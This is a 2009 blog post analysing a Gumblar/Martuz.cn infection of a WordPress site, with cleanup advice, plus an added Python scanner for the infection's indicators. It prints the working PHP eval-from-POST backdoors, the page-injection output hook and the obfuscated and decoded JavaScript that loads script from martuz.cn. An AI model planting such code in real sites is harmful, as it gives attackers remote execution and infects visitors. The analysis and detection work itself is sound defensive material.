Blog for hpHosts, and whatever else I feel like writing about ....

Friday, 22 May 2009

Martuz.cn (aka Gumblar) and WordPress does not a good mix make ....

I spent a couple of hours last night (it's now 01:07 here) cleaning up someone's WordPress based site after it became infected with the now very publicized Gumblar/Martuz infection. A quick look at the files showed the infection to be present in only a few of them, but the file locations varied.

For example, in wp-config.php we see (formatted for readability):

if(!function_exists('tmp_lkojfghx'))
{
    // backdoor: any PHP sent in the tmp_lkojfghx3 POST field is executed as-is
    if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);
    // the injected <script> block (decoded below) is kept Base64-encoded in a constant
    if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('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'));
    // output-buffer callback: rewrites every page just before it is sent to the browser
    function tmp_lkojfghx($s)
    {
        // gzip-compressed output (magic bytes 1f 8b) is inflated first and re-encoded on return
        if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));
        // strip long obfuscated <script> blocks left by other injections (eval/fromCharCode/document.write)
        if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5)
        {
            $e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);
            if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);
        }
        // remove any earlier copy of its own payload, then insert it before <body> (or append it)
        $s1=preg_replace('#<script language=javascript><!-- \n\(function\(.+?\n --></script>#','',$s);
        if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);
        elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;
        return $g?gzencode($s):$s;
    }
    // installed as the error handler; every call (re)installs the output-buffer hook above
    function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0)
    {
        $s=array();
        // chain to whatever error handler the site had before
        if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);
        // bail out if the hook is already active; otherwise note the existing buffers
        foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;
        else $s[]=array($a=='default output handler'?false:$a);
        // unwind the existing buffers, saving their contents
        for($i=count($s)-1;$i>=0;$i--)
        {
            $s[$i][1]=ob_get_contents();
            ob_end_clean();
        }
        // start the hook at the bottom of the stack, then re-create the original buffers on top
        ob_start('tmp_lkojfghx');
        for($i=0;$i<count($s);$i++)
        {
            ob_start($s[$i][0]);
            echo $s[$i][1];
        }
    }
}
if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;
tmp_lkojfghx2();


That lovely bit of Base64 you see above decodes to:

<script language=javascript><!--
(function(DBCp){var O7l='%';eval(unescape((':76ar:20a:3d:22ScriptEngine:22:2cb:3d:22V:65r:73:69on():2b:22:2cj:3d:22:22:2cu:3d:6eaviga:74:6fr:2eu:73er:41g:65n:74:3bif((u:2einde:78Of(:22:43:68rom:65:22):3c:30):26:26(u:2eind:65xOf(:22W:69n:22):3e0):26:26(u:2eindexOf(:22NT:206:22:29:3c0):26:26(do:63ument:2ec:6fokie:2e:69nde:78Of(:22miek:3d1:22:29:3c:30):26:26:28:74y:70eo:66(z:72v:7at:73):21:3dtypeo:66(:22A:22))):7b:7a:72v:7ats:3d:22:41:22:3beva:6c(:22if:28wi:6ed:6f:77:2e:22+a+:22:29j:3dj+:22+a:2b:22:4da:6ao:72:22+b+a+:22M:69nor:22:2bb+:61+:22:42u:69l:64:22:2bb+:22:6a:3b:22):3bd:6fc:75ment:2ewrite:28:22:3cscript:20src:3d:2f:2fmart:22:2b:22uz:2ec:6e:2fvid:2f:3fid:3d:22:2bj+:22:3e:3c:5c:2f:73c:72ipt:3e:22):3b:7d').replace(DBCp,O7l)))})(/\:/g);
--></script>


This is what you'll see in all of the .js files (the mumrik theme, for example, has 5 .js files, and every single one of them contained the above), and it decodes to:

// only runs once per page (zrvzts guard), for non-Chrome browsers on Windows other than NT 6, when no miek=1 cookie is set;
// it then writes a script tag loading martuz.cn/vid/?id=<ScriptEngine major/minor/build version>
var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src=//mart"+"uz.cn/vid/?id="+j+"><\/script>");}


However, apart from the wp-config.php file, the only files carrying the code with the Base64 rubbish were the index.php files (across the entire WordPress install, including all themes); oddly, the plugins were unaffected, as was the wp-admin directory.

Finally, of course, we had the obligatory gifimg.php file. Again, there was only one in this particular case, and it was located in the exec-php/images/ directory. This contained yet another Base64 encoded script, which decoded to:

if(isset($_POST['e']))eval(base64_decode($_POST['e']));


Presumably this receives POST data from the attackers' server and/or the attackers themselves. I'd love to get hold of the tools used to carry out the actual infection, as well as to find out what is actually contained in the POST requests referenced in these scripts.
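A defender's check for the indicators described above, added here as an example (it is not the original author's code): it walks a WordPress tree and flags files containing the tmp_lkojfghx hook, an eval() fed from $_POST, the martuz.cn script tag (in both the ':XX'-escaped and the decoded form), or a gifimg.php drop file. The mini site tree that demo() builds is constructed for illustration.

```python
import re
import tempfile
from pathlib import Path
from urllib.parse import unquote

# Indicators from the infection described in the post: the output-buffer hook names,
# an eval() fed from $_POST, and the martuz.cn script tag written into the theme .js files.
PATTERNS = {
    "ob_handler": re.compile(r"tmp_lkojfghx|TMP_XHGFJOKL", re.I),
    "post_eval": re.compile(r"eval\s*\(\s*(base64_decode\s*\()?\s*\$_POST\b", re.I),
    "martuz_js": re.compile(r'mart"\s*\+\s*"uz\.cn|martuz\.cn', re.I),
}

def decode_colon_escapes(text):
    """Undo the ':XX' -> '%XX' -> unescape() trick the obfuscated .js payload uses."""
    return unquote(text.replace(":", "%"))

def scan_file(path):
    """Return the indicator names that fire for one file (empty list if clean)."""
    hits = ["gifimg"] if path.name == "gifimg.php" else []  # the drop file from the post
    raw = path.read_text(errors="replace")
    views = (raw, decode_colon_escapes(raw))  # match the obfuscated and the decoded form
    for name, rx in PATTERNS.items():
        if any(rx.search(v) for v in views):
            hits.append(name)
    return hits

def scan_tree(root):
    """Walk a site tree; map each flagged file (relative path) to its indicators."""
    root = Path(root)
    found = {p.relative_to(root).as_posix(): scan_file(p) for p in sorted(root.rglob("*"))
             if p.is_file() and p.suffix in {".php", ".js", ".html"}}
    return {rel: hits for rel, hits in found.items() if hits}

def demo():
    """Scan a constructed mini WordPress tree (sample data, not a real site)."""
    root = Path(tempfile.mkdtemp())
    files = {  # constructed samples echoing the fragments quoted in the post
        "wp-config.php": "<?php\nif(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);\n",
        "wp-content/themes/mumrik/js/menu.js": "eval(unescape((':2f:2fmart:22:2b:22uz:2ec:6e').replace(DBCp,O7l)));",
        "wp-content/plugins/exec-php/images/gifimg.php": "<?php if(isset($_POST['e']))eval(base64_decode($_POST['e']));",
        "index.php": "<?php require('./wp-blog-header.php');\n",  # clean control file
    }
    for rel, body in files.items():
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_text(body)
    return scan_tree(root)
```

Run scan_tree() against a real document root to list the flagged files; a clean restore from backup, as the post recommends, is still the fix.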

Needless to say, if your site does become affected by this, you'll find it far quicker and far easier to just wipe the files and restore a clean backup (you do frequently back up your site's files - don't you?), and of course, though this should be blatantly obvious, STOP using basic passwords - they're not doing you any good (and yes, I know it's because they're easy to remember). If you are affected by this, or your website/server is affected by a different infection, and you need help cleaning it up, pop over to the Malware Domain List forums:

http://www.malwaredomainlist.com/forums/index.php?board=17.0

2 comments:

Jacky said...

For the usual Chinese crap, the hosts file can't do much, but Proxomitron users CAN!

http://prxbx.com/forums/showthread.php?tid=1374

MysteryFCM said...

A firewall filter, PAC file, or IE restricted sites rule will prevent access to sites too ;o)